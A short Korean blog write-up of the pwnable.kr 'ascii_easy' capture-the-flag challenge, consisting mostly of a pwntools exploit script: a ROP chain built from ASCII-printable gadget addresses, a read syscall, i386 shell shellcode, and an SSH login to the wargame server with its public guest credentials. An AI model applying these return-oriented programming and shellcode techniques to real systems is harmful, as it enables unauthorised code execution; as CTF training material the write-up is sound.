그냥 맞는 가젯 찾아서 쉘 따는 노가다 문제
Exploit Code
from pwn import *
inc_eax = 0x556c6864
mov_ebx_edx = 0x55623542 # 0x000c5542 : mov ebx, edx ; cmp eax, 0xfffff001 ; jae 0xc5555 ; ret
pop_ecx = 0x556d2a51 # 0x00174a51 : pop ecx ; add al, 0xa ; ret
inc_edx = 0x55642d7a # 0x000e4d7a : inc edx ; xor eax, eax ; ret
mov_edx_0xffff = 0x55617940 # 0x000b9940 : mov edx, 0xffffffff ; cmovne eax, edx ; ret
inc_edi_syscall = 0x55667176
# eax = 3, ebx = 0, ecx = 0x55667176, edx = 50 and syscall
payload = "A"*0x20
payload += p32(pop_ecx)+p32(0x55667179) # ecx -> 0x55667176
payload += p32(mov_edx_0xffff)+p32(inc_edx) # edx -> 0
payload += p32(mov_ebx_edx) # ebx -> 0
payload += p32(inc_edx)*50 # edx -> 50
payload += p32(inc_eax)*3
payload += p32(inc_edi_syscall)
shellcode = shellcraft.i386.linux.sh()
#p=process(['./ascii_easy', payload])
sh = ssh('ascii_easy', 'pwnable.kr', password='guest', port=2222)
p = sh.process(['./ascii_easy', payload])
p.send(asm(shellcode))
p.interactive()Capture the Flag
'Writeup [pwn] > pwnable.kr' 카테고리의 다른 글
| crypto1 (0) | 2020.03.07 |
|---|---|
| brainfuck (0) | 2020.03.07 |
| unlink (0) | 2020.03.07 |
| Random (0) | 2020.03.07 |
| passcode (0) | 2020.03.07 |